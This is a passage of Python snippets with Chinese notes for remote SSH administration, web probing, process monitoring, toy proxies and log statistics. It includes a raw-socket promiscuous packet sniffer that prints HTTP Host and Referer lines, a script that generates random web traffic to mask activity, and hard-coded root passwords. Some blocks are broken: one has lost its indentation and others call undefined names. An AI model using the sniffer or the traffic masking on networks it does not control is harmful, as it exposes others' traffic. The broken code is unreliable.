            ssh.close()

    def get_result(self):
        """Return the stored output, or None if run() has not stored one yet."""
        return self.result
ThreadPool = []  # worker threads
starttime = datetime.datetime.now()
for item in range(5):
    obj = MyThread("192.168.1.20","root","123","22","ifconfig")
    ThreadPool.append(obj)
# Start every worker before waiting for any of them. Joining inside the
# start loop made each thread finish before the next one began.
for item in ThreadPool:
    item.start()
for item in ThreadPool:
    item.join()
for item in ThreadPool:
    ret = item.get_result()  # collect the stored result
    print(ret)
endtime = datetime.datetime.now()
print("程序開始運行:{} 結束:{}".format(starttime,endtime))
第二種方式
import paramiko,datetime,threading
# Module-level paramiko SSH client object.
ssh = paramiko.SSHClient()
# Use paramiko's AutoAddPolicy for servers whose host key is not known yet.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def ssh_shell(address,username,password,port,command):
    """Run *command* on *address* over SSH and return its decoded output.

    Args:
        address: Host to connect to.
        username: Login name.
        password: Login password.
        port: SSH port (int or numeric string).
        command: Command line to execute remotely.

    Returns:
        The command's stdout as text, its stderr when stdout is empty, or
        the string "0" when anything fails.
    """
    client = None
    try:
        # One client per call, so calls made from different threads do not
        # share connection state.
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(address,port=int(port),username=username,password=password,timeout=1)
        stdin, stdout, stderr = client.exec_command(command)
        result = stdout.read()
        if not result:
            result=stderr.read()
        return result.decode()
    except Exception:
        return "0"
    finally:
        # Close on the failure path as well.
        if client is not None:
            client.close()
class MyThread(threading.Thread):
    """Thread wrapper that remembers the return value of the wrapped call."""

    def __init__(self,func,args=()):
        threading.Thread.__init__(self)
        self.func, self.args = func, args

    def run(self):
        # Call the target with the stored positional arguments and keep
        # whatever it returns.
        outcome = self.func(*self.args)
        self.result = outcome

    def get_result(self):
        """Return the stored return value, or None when none has been stored."""
        return getattr(self, "result", None)
starttime = datetime.datetime.now()
# Ten workers, each wrapping the same ssh_shell call.
ThreadPool = [
    MyThread(func=ssh_shell,args=("192.168.1.20","root","123","22","pwd"))
    for _ in range(10)
]
# Each worker is joined right after it is started, so the calls run one
# after another.
for worker in ThreadPool:
    worker.start()
    worker.join()
for worker in ThreadPool:
    print(worker.get_result())
endtime = datetime.datetime.now()
print("程序開始運行:{} 結束:{}".format(starttime,endtime))
web頁面探測工具 探測頁面健康狀態
import pycurl,certifi
from io import BytesIO
# Extra request headers handed to pycurl.
headers = ['Accept:*/*','User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0']


def header_function(header_line):
    """Header callback: decode one raw response header line (currently unused further).

    Args:
        header_line: One header line as bytes.
    """
    # Header bytes are not guaranteed to be UTF-8. ISO-8859-1 maps every
    # byte value, so decoding can no longer raise inside the callback.
    header_line = header_line.decode("iso-8859-1")
    #print(header_line.split(":"))
class ex_response(object):
    """Fetch one URL with pycurl and print timing/size statistics for the transfer."""

    def __init__(self,url):
        """Configure the curl handle and perform the request immediately.

        Args:
            url: Address to fetch.
        """
        # Set when perform() fails, so getinfo() does not touch closed handles.
        self.failed = False
        self.buffer = BytesIO()                               # receives the response
        self.c = pycurl.Curl()                                # curl handle
        self.c.setopt(pycurl.URL,url)                         # target address
        self.c.setopt(pycurl.CAINFO,certifi.where())          # CA bundle for TLS verification
        self.c.setopt(pycurl.WRITEDATA, self.buffer)
        self.c.setopt(pycurl.WRITEHEADER,self.buffer)
        self.c.setopt(self.c.HTTPHEADER,headers)              # extra request headers
        self.c.setopt(pycurl.HEADERFUNCTION, header_function) # per-header callback
        try:
            self.c.perform()
        except Exception:
            self.failed = True
            self.buffer.close()
            self.c.close()

    def getinfo(self):
        """Print the statistics of the finished transfer and release the handles.

        When the transfer failed in __init__ the handles are already closed;
        a short notice is printed instead of querying them.
        """
        if self.failed:
            print("[-] transfer failed, no statistics available")
            return
        h1 = self.c.getinfo(pycurl.HTTP_CODE)            # status code
        h2 = self.c.getinfo(pycurl.TOTAL_TIME)           # total transfer time
        h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME)      # DNS lookup time
        h4 = self.c.getinfo(pycurl.CONNECT_TIME)         # connect time
        h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME)     # time until ready to transfer
        h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME)   # time until transfer start
        h7 = self.c.getinfo(pycurl.REDIRECT_TIME)        # time spent on redirects
        h8 = self.c.getinfo(pycurl.SIZE_UPLOAD)          # uploaded size
        h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD)        # downloaded size
        h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD)      # average download speed
        h11 = self.c.getinfo(pycurl.SPEED_UPLOAD)        # average upload speed
        h12 = self.c.getinfo(pycurl.HEADER_SIZE)         # size of the response headers
        # The two size lines were labelled "bytes/s" although they are sizes.
        info = "\n".join((
            "",
            "http狀態碼:%s",
            "傳輸結束總時間:%.2f ms",
            "DNS解析時間:%.2f ms",
            "建立連接時間:%.2f ms",
            "准備傳輸時間:%.2f ms",
            "傳輸開始時間:%.2f ms",
            "重定向時間:%.2f ms",
            "上傳數據包大小:%d bytes",
            "下載數據包大小:%d bytes",
            "平均下載速度:%d bytes/s",
            "平均上傳速度:%d bytes/s",
            "http頭文件大小:%d byte",
            "",
        )) %(h1,h2*1000,h3*1000,h4*1000,h5*1000,h6*1000,h7*1000,h8,h9,h10,h11,h12)
        print(info)
        self.buffer.close()
        self.c.close()
# Sample probe, executed only when the file is started as a script.
if __name__ == "__main__":
    ex_response("https://www.baidu.com").getinfo()
內網流量混淆
import requests
import random
import time
import threading
# Request headers sent with every fetch (desktop-browser User-Agent).
header = {'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120'}
# Pool of addresses from which one is picked at random for each request.
url = [
    "https://www.baidu.com",
    "https://voice.baidu.com/act/newpneumonia/newpneumonia/",
    # Was "https://http://news.baidu.com/", which is not a valid URL.
    "https://news.baidu.com/",
    "https://tieba.baidu.com/",
    "https://map.baidu.com/",
    "https://im.qq.com/",
]
def tstart():
    """Request random entries of ``url`` forever, printing "ok" or "error" per reply."""
    while True:
        try:
            target = random.choice(url)
            reply = requests.get(url=target, headers=header, timeout=1)
            verdict = "{} ok" if reply.status_code == 200 else "{} error"
            print(verdict.format(target))
        except Exception:
            # A failed request is skipped silently and the loop goes on.
            continue
# Three worker threads, each running tstart().
t, t1, t2 = (threading.Thread(target=tstart) for _ in range(3))
for worker in (t, t1, t2):
    worker.start()
psutil 使用該模塊完成遍歷。
import psutil
# 獲取到網卡的出口入口流量信息
def GetNetwork():
    """Print sent/received byte and packet counters for each network interface."""
    per_nic = psutil.net_io_counters(pernic=True,nowrap=True)
    for each, stats in per_nic.items():
        row = (each, stats.bytes_sent, stats.bytes_recv,
               stats.packets_sent, stats.packets_recv)
        print("[*] 網卡: %-35s 發送/接收字節: %s/%s 發送/接收包數量: %s/%s" % row)
# 獲取到當前電腦中的網絡連接狀態: tcp tcp4 tcp6 udp inet4 inet6
def GetNetworkLink():
    """List TCP sockets in state ESTABLISHED or LISTEN with their owning process.

    Returns:
        A list of [process name, local port] pairs, one per printed line.
    """
    network = psutil.net_connections(kind="tcp")
    AllowData = []
    for each in network:
        if each.status not in ("ESTABLISHED","LISTEN"):
            continue
        src_addr,src_port = each.laddr.ip,each.laddr.port
        src_pid = each.pid
        if src_pid is None:
            # No owning process reported for this socket; skip it.
            continue
        try:
            name = psutil.Process(src_pid).name()
        except psutil.Error:
            # The process ended or may not be inspected; skip this entry
            # instead of aborting the whole listing.
            continue
        print("[+] IP地址: %15s:%-5s PID: %5s 名稱: %-10s"
              %(src_addr,src_port,src_pid,name))
        AllowData.append([name,src_port])
    return AllowData
# 遍歷整個系統中所有進程PID並取出關鍵數據
def GetProcessID():
    """Print name, thread count, memory share, start time and resource details of every process.

    Processes that disappear or cannot be inspected while being read are
    skipped.
    """
    for each in psutil.pids():
        try:
            p = psutil.Process(int(each))
            # Gather everything first, so a process that fails half-way
            # does not leave a partial record on screen.
            summary = ("進程: %25s 線程數: %5s 內存利用率:%3s 進程創建時間: %-20s"
                       %(p.name(),p.num_threads(),int(p.memory_percent()),p.create_time()))
            details = [
                "CPU時間信息: {}".format(p.cpu_times()),
                "MEM內存信息: {}".format(p.memory_info()),
                "進程IO讀寫參數: {}".format(p.io_counters()),
                "進程對外SOCKET: {}".format(p.connections()),
            ]
        except psutil.Error:
            # The original let the first such error stop the whole walk.
            continue
        print("-" * 100)
        print(summary)
        print("-" * 100)
        for line in details:
            print(line)
        print("\r"*100)
以下代碼是從網上爬的,收藏了。
In [25]: import psutil
In [26]: from pprint import pprint as pp
#根據進程名查看系統中的進程名與pid
In [27]: pp([p.info for p in psutil.process_iter(attrs=['pid','name']) if 'python
...: ' in p.info['name']])
[{'name': 'ipython3', 'pid': 2429}]
In [28]: pp([p.info for p in psutil.process_iter(attrs=['pid','name']) if 'mysql'
...: in p.info['name']])
[{'name': 'mysqld_safe', 'pid': 987}, {'name': 'mysqld', 'pid': 1265}]
#所有用戶進程
In [32]: import getpass
In [33]: pp([(p.pid,p.info['name']) for p in psutil.process_iter(attrs=['name','u
...: sername']) if p.info['username'] == getpass.getuser()])
[(1, 'systemd'),
(2, 'kthreadd'),
(3, 'ksoftirqd/0'),
(5, 'kworker/0:0H'),
(6, 'kworker/u256:0'),
...
(5004, 'kworker/0:0')]
#查看積極運行的進程:
In [37]: pp([(p.pid,p.info) for p in psutil.process_iter(attrs=['name','status'])
...: if p.info['status'] == psutil.STATUS_RUNNING])
[(2429, {'name': 'ipython3', 'status': 'running'})]
#使用日志文件的進程
In [38]: import os,psutil
In [39]: for p in psutil.process_iter(attrs=['name','open_files']):
...: for file in p.info['open_files'] or []:
...: if os.path.splitext(file.path)[1] == '.log':
...: print("%-5s %-10s %s" % (p.pid,p.info['name'][:10],file.path
...: ))
...:
auditd /var/log/audit/audit.log
vmtoolsd /var/log/vmware-vmsvc.log
tuned /var/log/tuned/tuned.log
#消耗超過5M內存的進程:
In [42]: pp([(p.pid,p.info['name'],p.info['memory_info'].rss) for p in psutil.pro
...: cess_iter(attrs=['name','memory_info']) if p.info['memory_info'].rss > 5
...: * 1024 * 1024])
[(1, 'systemd', 7118848),
(411, 'systemd-udevd', 6254592),
(712, 'polkitd', 13553664),
(716, 'abrtd', 5734400),
(724, 'VGAuthService', 6262784),
(725, 'vmtoolsd', 6426624),
(974, 'tuned', 19648512),
(1265, 'mysqld', 45268992),
(2204, 'sshd', 5726208),
(2429, 'ipython3', 37232640)]
#消耗量最大的3個進程
In [43]: pp([(p.pid, p.info) for p in sorted(psutil.process_iter(attrs=['name', '
...: memory_percent']), key=lambda p: p.info['memory_percent'])][-3:])
[(974, {'memory_percent': 0.9451434561080659, 'name': 'tuned'}),
(2429, {'memory_percent': 1.7909847854955845, 'name': 'ipython3'}),
(1265, {'memory_percent': 2.177553778800572, 'name': 'mysqld'})]
#消耗最多CPU時間的前3個進程
In [44]: pp([(p.pid, p.info['name'], sum(p.info['cpu_times'])) for p in sorted(ps
...: util.process_iter(attrs=['name', 'cpu_times']), key=lambda p: sum(p.info
...: ['cpu_times'][:2]))][-3:])
[(1265, 'mysqld', 13.93),
(2429, 'ipython3', 14.809999999999999),
(725, 'vmtoolsd', 16.74)]
#導致最多I/O的前3個進程
In [45]: pp([(p.pid, p.info['name']) for p in sorted(psutil.process_iter(attrs=['
...: name', 'io_counters']), key=lambda p: p.info['io_counters'] and p.info['
...: io_counters'][:2])][-3:])
[(2429, 'ipython3'), (725, 'vmtoolsd'), (1, 'systemd')]
#前3個進程打開最多的文件描述符:
In [46]: pp([(p.pid, p.info) for p in sorted(psutil.process_iter(attrs=['name', '
...: num_fds']), key=lambda p: p.info['num_fds'])][-3:])
[(377, {'name': 'systemd-journald', 'num_fds': 24}),
(1, {'name': 'systemd', 'num_fds': 43}),
(1307, {'name': 'master', 'num_fds': 91})]
watchdog 文件目錄實時 監控文件變化。
from watchdog.observers import Observer
from watchdog.events import *
import time
class FileEventHandler(FileSystemEventHandler):
    """Event handler that prints one line per move/create/delete/modify event."""

    def __init__(self):
        super().__init__()

    def on_moved(self, event):
        # Choose the wording by target kind, then fill in old and new path.
        template = "目錄 {0} 更改為 {1}" if event.is_directory else "文件 {0} 更改為 {1}"
        print(template.format(event.src_path,event.dest_path))

    def on_created(self, event):
        template = "目錄被創建:{0}" if event.is_directory else "文件被創建:{0}"
        print(template.format(event.src_path))

    def on_deleted(self, event):
        template = "目錄被刪除:{0}" if event.is_directory else "文件被刪除:{0}"
        print(template.format(event.src_path))

    def on_modified(self, event):
        template = "目錄被更改:{0}" if event.is_directory else "文件被更改:{0}"
        print(template.format(event.src_path))
if __name__ == "__main__":
    observer = Observer()
    event_handler = FileEventHandler()
    # Raw string: "\M" is not a valid escape sequence in a normal literal.
    # The resulting path is unchanged. ``recursive`` is passed by keyword.
    observer.schedule(event_handler, r"Z:\MyWeb", recursive=True)
    observer.start()
    try:
        # Keep the main thread alive until interrupted.
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()
    observer.join()
python HTTP/HTTPS 代理轉發
from wsgiref.simple_server import make_server
import requests
def RunServer(environ,star_response):
    """WSGI application: relay a fixed page for the "lyshark" sub-domain, else answer 404.

    Args:
        environ: WSGI environment; only HTTP_HOST is read.
        star_response: WSGI start_response callable.

    Returns:
        A one-element list holding the response body as bytes.
    """
    # Charset was misspelled "urf-8" in the original header value.
    content_type = [('Content-Type','text/html;charset=utf-8')]
    rHost = environ.get("HTTP_HOST", "")
    sub = rHost.split(".")[0]
    if sub == "lyshark":
        response = requests.get(url="http://www.baidu.com",timeout=10)
        by = bytes(response.text,encoding="utf-8")
        # HTTP_USER_AGENT
        # REQUEST_METHOD
        # PATH_INFO
        star_response("200 OK",content_type)
        return [by,]
    # The not-found body is now sent with a matching status instead of 200.
    star_response("404 Not Found",content_type)
    response = b"<b> 404 not found </b>"
    return [response,]
if __name__ == "__main__":
    httpd = make_server("0.0.0.0",8080,RunServer)
    # The message used to announce port 80 although the server binds 8080.
    print("[*] 服務已啟動 0.0.0.0:8080")
    httpd.serve_forever()

稍微改一改,變成負載均衡,作孽啊。
from wsgiref.simple_server import make_server
import requests,random
def RunServer(environ,star_response):
    """WSGI application: forward each request to one randomly chosen backend.

    Args:
        environ: WSGI environment; only HTTP_HOST is read (for logging).
        star_response: WSGI start_response callable.

    Returns:
        A one-element list with the backend's body, or a short 502 page
        when the backend request fails.
    """
    # Charset was misspelled "urf-8" in the original header value.
    content_type = [('Content-Type','text/html;charset=utf-8')]
    rHost = environ.get("HTTP_HOST", "")
    sub = rHost.split(".")[0]
    a = ["http://192.168.1.10","http://192.168.1.20"]
    print(rHost,sub)
    try:
        response = requests.post(url=random.choice(a),timeout=10)
    except requests.RequestException:
        # Backend unreachable or timed out: answer with a gateway error
        # instead of letting the exception escape the application.
        star_response("502 Bad Gateway",content_type)
        return [b"<b> 502 bad gateway </b>",]
    star_response("200 OK",content_type)
    by = bytes(response.text,encoding="utf-8")
    return [by,]
# Serve on all interfaces, port 8080, until the process is stopped.
if __name__ == "__main__":
    make_server("0.0.0.0",8080,RunServer).serve_forever()

python 解碼IP層 混雜模式,抓包,解碼自己搞吧。
import os,socket,struct
from ctypes import *
# Raw IP socket bound to one local address; port 0 is passed to bind().
socket_protocol = socket.IPPROTO_IP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind(("192.168.1.2", 0))
# Ask for the IP header to be included in what is received.
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# SIO_RCVALL / RCVALL_ON: socket.ioctl() is only available on Windows.
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
while True:
    # recvfrom() returns (data, address); only the data is used.
    raw_buffer, _sender = sniffer.recvfrom(65565)
    print(raw_buffer.decode('utf-8','ignore'))

強大的過濾系統
import os,socket,struct
from ctypes import *
# Raw IP socket bound to one local address; port 0 is passed to bind().
socket_protocol = socket.IPPROTO_IP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind(("192.168.1.2", 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# SIO_RCVALL / RCVALL_ON: socket.ioctl() is only available on Windows.
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
while True:
    raw_buffer = sniffer.recvfrom(65565)[0]
    string = str(raw_buffer.decode('utf-8','ignore')).splitlines()
    # Print only lines mentioning Host, Referer or Accept; a Host line is
    # preceded by a separator.
    for item, each in enumerate(string):
        if 'Host' in each:
            print("------------------------------------------------------------")
            print(each)
        elif 'Referer' in each or 'Accept' in each:
            print(each)

列表生成式
'''
aa = [x for x in os.listdir(di) if os.path.splitext(x)[1] == ".png"]
pen = []
print(aa)
for i in aa:
dd = di+i
print("[+] dirname: {} {}".format(dd,os.stat(dd).st_size))
pen.append(os.stat(dd).st_size)
print(pen)
'''
python web 服務器本質: jinja.html
<body>
<h1>{{name}}</h1>
<ul>
{% for item in user_list %}
<li>{{item}}</li>
{% endfor %}
</ul>
</body>
main.py
from wsgiref.simple_server import make_server
from jinja2 import Template
def index():
    """Return the content of ./index.html as UTF-8 encoded bytes."""
    with open("./index.html", "r", encoding="utf-8") as page:
        return page.read().encode("utf-8")
def jinja():
    """Render ./jinja.html with a fixed name and user list; return UTF-8 bytes."""
    with open("./jinja.html", "r", encoding="utf-8") as source:
        template = Template(source.read())
    rendered = template.render(name='John Doe', user_list=['alex', 'eric'])
    return rendered.encode("utf-8")
# Routing table: (request path, handler function) pairs.
url_func = [
('/index/',index),('/jinja/',jinja)]
def RunServer(environ,star_response):
    """WSGI application: dispatch PATH_INFO through ``url_func`` or answer 404.

    Args:
        environ: WSGI environment; PATH_INFO, REMOTE_ADDR and HTTP_HOST are read.
        star_response: WSGI start_response callable.

    Returns:
        A one-element list holding the response body as bytes.
    """
    # Charset was misspelled "urf-8" in the original header value.
    content_type = [('Content-Type','text/html;charset=utf-8')]
    url = environ.get("PATH_INFO", "")
    rAddr = environ.get("REMOTE_ADDR", "")
    rHost = environ.get("HTTP_HOST", "")
    print("[+] 根域名: {} 路徑: {} 目標IP: {}".format(rHost,url,rAddr))
    # First table entry whose path equals the request path, if any.
    func = next((handler for path, handler in url_func if path == url), None)
    if func:
        # Build the body before sending the status, so a handler error is
        # not reported as 200.
        response = func()
        star_response("200 OK",content_type)
    else:
        # The not-found body is now sent with a matching status instead of 200.
        response = b"<b> 404 not found </b>"
        star_response("404 Not Found",content_type)
    return [response,]
if __name__ == "__main__":
    httpd = make_server("0.0.0.0",8080,RunServer)
    # The message used to announce port 80 although the server binds 8080.
    print("[*] 服務已啟動 0.0.0.0:8080")
    httpd.serve_forever()
運行后,訪問模板頁面,完成頁面渲染。

python 打包 執行 python setup.py build
import sys
from cx_Freeze import setup, Executable
# "Win32GUI" base on Windows, no explicit base elsewhere.
base = "Win32GUI" if sys.platform == "win32" else None
setup(
    name="MyApp",
    version="0.1",
    description="My python",
    executables=[Executable("daili.py", base=base)],
)
動態進度: 改版后,可實現msf同款效果。
import time,random
def DynamicBar(scale,sleep):
    """Draw a text progress bar that fills in ``scale`` steps.

    Args:
        scale: Number of steps (the bar is drawn scale + 1 times).
        sleep: Seconds to pause after each redraw. The original ignored
            this argument and always paused one second.

    Each redraw starts with a carriage return and shows the percentage, the
    bar and the seconds elapsed since the call started.
    """
    started = time.perf_counter()
    for item in range(scale+1):
        StartProgress = item * "#"
        EndProgress = (scale-item) * "."
        # scale == 0 means there is nothing to wait for: show 100 %.
        Count = (item/scale) * 100 if scale else 100.0
        # Elapsed time; the original printed the raw counter value.
        dur = time.perf_counter() - started
        print("\r{:^3.0f}%[ {}->{} ]{:.2f}s".format(Count, StartProgress, EndProgress, dur), end="")
        time.sleep(sleep)
# Demo entry point: clears the console, prints an ASCII-art banner and then
# calls DynamicString() with a sample sentence.
# NOTE(review): DynamicString is not defined in the visible part of this file
# (the function defined just above is DynamicBar) - confirm which call is meant.
if __name__ == "__main__":
# Runs the console command "cls".
os.system("cls")
# The banner text is left exactly as written; it contains backslashes.
banner = '''
__ __ __
/ | / | / |
$$ | __ __ _______ $$ |____ ______ ______ $$ | __
$$ |/ | / | / |$$ \ / \ / \ $$ | / |
$$ |$$ | $$ |/$$$$$$$/ $$$$$$$ | $$$$$$ |/$$$$$$ |$$ |_/$$/
$$ |$$ | $$ |$$ \ $$ | $$ | / $$ |$$ | $$/ $$ $$<
$$ |$$ \__$$ | $$$$$$ |$$ | $$ |/$$$$$$$ |$$ | $$$$$$ \
$$ |$$ $$ |/ $$/ $$ | $$ |$$ $$ |$$ | $$ | $$ |
$$/ $$$$$$$ |$$$$$$$/ $$/ $$/ $$$$$$$/ $$/ $$/ $$/
/ \__$$ |
$$ $$/
$$$$$$/
'''
print(banner)
DynamicString("hello lyshark this is a test case wwa sdfw rtis aos")

圖片轉為字符圖片:
from PIL import Image
def get_char(r,g,b,alpha = 256):
    """Map one RGB(A) pixel to a character of a 14-symbol ramp.

    Args:
        r, g, b: Colour channel values.
        alpha: Alpha channel; a value of 0 always yields a space.

    Returns:
        The ramp character selected by the pixel's weighted grey value.
    """
    if alpha == 0:
        return " "
    palette = "~!@#$%^&*()_+ "
    gray = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
    # Width of one grey-value bucket per ramp character.
    unit = (256.0 + 1)/len(palette)
    return palette[int(gray/unit)]
if __name__ == "__main__":
    # NOTE(review): `args` is not defined in the visible part of this file;
    # presumably an argument parser providing file/width/height - confirm.
    if args.file is not None:
        img = Image.open(args.file)
        img = img.resize((args.width,args.height), Image.NEAREST)
        # One text line per pixel row, joined once at the end instead of
        # growing a string character by character.
        lines = []
        for row in range(args.height):
            lines.append("".join(get_char(*img.getpixel((col,row))) for col in range(args.width)))
        txt = "".join(line + "\n" for line in lines)
        print(txt)

Python 實現的自動化服務器管理
import sys
import os
import paramiko
# Module-level paramiko SSH client object.
ssh = paramiko.SSHClient()
# Use paramiko's AutoAddPolicy for servers whose host key is not known yet.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def ssh_cmd(user,passwd,port,userfile,cmd):
    """Run *cmd* over SSH on every host listed in *userfile* and print a summary table.

    Args:
        user: Login name used on every host.
        passwd: Login password.
        port: SSH port (int or string).
        userfile: Path of a text file with one host per line; empty lines
            are skipped.
        cmd: Command line to execute remotely.
    """
    check_ok=[]
    check_er=[]
    with open(userfile, "r") as file:
        hosts = [entry.strip() for entry in file if entry.strip()]
    for host in hosts:
        print("-------------------------------------------->" + host + "<--------------------------------------------\n" )
        try:
            ssh.connect(hostname=host,port=port,username=user,password=passwd)
            stdin, stdout, stderr = ssh.exec_command(cmd)
            result = stdout.read()
            if not result:
                # Nothing on stdout: show stderr instead.
                result=stderr.read()
            ssh.close()
            print(result.decode())
            check_ok.append(host)
        except Exception:
            check_er.append(host)
            continue
    print("\n\n\n--------------------------------------------------------------------------------------------------------")
    print("主機IP\t\t\t端口\t\t\t命令\t\t\t狀態\t\t\t")
    print("--------------------------------------------------------------------------------------------------------")
    # str(port): concatenating an int port raised TypeError in the original.
    for host in check_ok:
        print(host + "\t\t"+str(port)+"\t\t\t"+cmd+"\t\t[完成]")
    for host in check_er:
        print(host + "\t\t"+ str(port) +"\t\t\t"+ cmd +"\t\t[失敗]")
    print("--------------------------------------------------------------------------------------------------------")
def ssh_put(user,passwd,source,target,userfile="./ip.txt",port=22):
    """Upload *source* to *target* via SFTP on every listed host and print a summary table.

    Args:
        user: Login name used on every host.
        passwd: Login password.
        source: Local file to upload.
        target: Remote destination path.
        userfile: Text file with one host per line (new, defaults to the
            previously hard-coded "./ip.txt"); empty lines are skipped.
        port: SSH port (new, defaults to the previously hard-coded 22).
    """
    check_ok=[]
    check_er=[]
    with open(userfile,"r") as file:
        hosts = [entry.strip() for entry in file if entry.strip()]
    for host in hosts:
        print("============================================>" + host + "<============================================" )
        transport = None
        try:
            transport = paramiko.Transport((host, port))
            transport.connect(username=user, password=passwd)
            sftp = paramiko.SFTPClient.from_transport(transport)
            sftp.put(source, target)
            check_ok.append(host)
        except Exception:
            check_er.append(host)
        finally:
            # The original never closed the transport.
            if transport is not None:
                transport.close()
    print("\n\n\n--------------------------------------------------------------------------------------------------------")
    print("主機IP\t\t\t端口\t\t\t傳輸源\t\t傳輸到\t\t 狀態 \n")
    print("--------------------------------------------------------------------------------------------------------")
    for host in check_ok:
        print(host + "\t\t" + str(port) + "\t\t" + source + "\t\t" + target + "\t\t" + "[完成]")
    for host in check_er:
        print(host + "\t\t" + str(port) + "\t\t" + source + "\t\t" + target + "\t\t" + "[失敗]")
    print("--------------------------------------------------------------------------------------------------------")
import shlex

# Interactive loop: "put" uploads a file, "cron"/"uncron" edit the remote
# crontab, "exit" quits, anything else is run as a command on every host.
while True:
    try:
        shell = input("[Shell] # ").strip()
    except (EOFError, KeyboardInterrupt):
        # stdin closed or Ctrl-C. The original swallowed EOFError and then
        # looped forever on the closed stream.
        sys.exit()
    if not shell:
        continue
    if shell == "exit":
        sys.exit()
    try:
        if shell == "put":
            ssh_put("root","123123","./a.py","/root/a.py")
        elif shell == "cron":
            temp = input("輸入一個計划任務: ")
            # Quote the entry so the remote shell does not expand the "*"
            # fields of a cron line.
            temp1 = "(crontab -l; echo " + shlex.quote(temp) + ") |crontab"
            ssh_cmd("root","123123","22","./user_ip.conf",temp1)
        elif shell == "uncron":
            temp = input("輸入要刪除的計划任務: ")
            # The original command contained an unterminated double quote.
            # -F matches the text literally, "--" protects a leading dash.
            temp1 = "crontab -l | grep -vF -- " + shlex.quote(temp) + " |crontab"
            ssh_cmd("root","123123","22","./user_ip.conf",temp1)
        else:
            ssh_cmd("lyshark","123123","22","./user_ip.conf",shell)
    except Exception:
        # A failing command must not end the shell.
        continue
統計access日志: 殘廢版。
import os,sys,re
import time
from collections import Counter

# Layout of the timestamp field, e.g. "11/Mar/2020:07:03:56".
# %b depends on the locale providing English month abbreviations.
_STAMP = "%d/%b/%Y:%H:%M:%S"
# NOTE(review): the original lower bound read "11/Apr/2020:07:03:56" and was
# compared as plain text. As a real date it lies after the upper bound, so
# 11/Mar is assumed here - confirm the intended window.
window_start = time.strptime("11/Mar/2020:07:03:56", _STAMP)[:6]
window_end = time.strptime("17/Mar/2020:14:16:25", _STAMP)[:6]

ls = []
with open("c://access.log","r",encoding="utf-8") as fp:
    for each in fp:
        try:
            data = each.split()[3][1:]
            # Compare (year, month, day, hour, minute, second) tuples
            # instead of the raw text.
            stamp = time.strptime(data, _STAMP)[:6]
            if window_start <= stamp <= window_end:
                # Text after the first "(", cut at the first ";" and
                # stripped of parentheses.
                t = each.split("(")[1]
                t1 = re.sub(r"\;.*$|\)|\(","",t)
                ls.append(t1)
        except (IndexError, ValueError):
            # Line too short or timestamp not parseable: skip it.
            continue
# Occurrences per extracted value.
lis = dict(Counter(ls))
print(lis)
erdai
import os,sys,re,time,datetime
from matplotlib.pylab import *
def Count_Equipment(log_name,start_time,end_time):
    """Plot the ten most frequent values of the 14th log field within a date range.

    Args:
        log_name: Path of the access log (UTF-8 text).
        start_time: First day to include, "YYYY-MM-DD". The original ignored
            this argument and used hard-coded text bounds.
        end_time: Last day to include, "YYYY-MM-DD".

    Raises:
        ValueError: if start_time or end_time is not in "YYYY-MM-DD" form.
    """
    from collections import Counter

    # (year, month, day) tuples compare chronologically.
    first_day = time.strptime(start_time,"%Y-%m-%d")[:3]
    last_day = time.strptime(end_time,"%Y-%m-%d")[:3]
    Agent = []
    with open(log_name,"r",encoding="utf-8") as fp:
        for each in fp:
            fields = each.split()
            try:
                # Field 4 looks like "[11/Mar/2020:07:03:56"; keep the date part.
                day = time.strptime(fields[3][1:].split(":")[0],"%d/%b/%Y")[:3]
                if first_day <= day <= last_day:
                    Agent.append(fields[13])
            except (IndexError, ValueError):
                # Line too short or date not parseable: skip it.
                continue
    # Ten most frequent values, largest first.
    top = Counter(Agent).most_common(10)
    x = [name for name, _ in top]
    y = [count for _, count in top]
    plt.rcParams["font.sans-serif"] = ["KaiTi"]
    plt.title("訪問設備類型前10")
    plt.xticks(rotation=70)
    for a,b in zip(x,y):
        # Write each count above its bar.
        plt.text(a, b, '%.0f' % b, ha='center', va= 'bottom',fontsize=7)
    plt.bar(x,y)
    plt.legend()
    plt.show()
# Example run over the sample log and date range.
Count_Equipment(log_name="c://access_log", start_time="2020-03-11", end_time="2020-03-17")

import os,sys,re,time,datetime
from matplotlib.pylab import *
def Count_Equipment(log_name,start_time,end_time):
    """Plot the ten most frequent values of the 14th log field within a date range.

    Args:
        log_name: Path of the access log (UTF-8 text).
        start_time: First day to include, "YYYY-MM-DD".
        end_time: Last day to include, "YYYY-MM-DD".

    Raises:
        ValueError: if start_time or end_time is not in "YYYY-MM-DD" form.
    """
    from collections import Counter

    # Convert the bounds once, before the loop. The original re-converted
    # them for every line; from the second line on that raised ValueError,
    # which was swallowed, so those lines were never counted.
    first_day = time.strptime(start_time,"%Y-%m-%d")[:3]
    last_day = time.strptime(end_time,"%Y-%m-%d")[:3]
    Agent = []
    with open(log_name,"r",encoding="utf-8") as fp:
        for each in fp:
            fields = each.split()
            try:
                # Compare (year, month, day) tuples rather than
                # "dd/Mon/yyyy" text, which does not sort chronologically.
                day = time.strptime(fields[3][1:].split(":")[0],"%d/%b/%Y")[:3]
                if first_day <= day <= last_day:
                    Agent.append(fields[13])
            except (IndexError, ValueError):
                # Line too short or date not parseable: skip it.
                continue
    # Ten most frequent values, largest first.
    top = Counter(Agent).most_common(10)
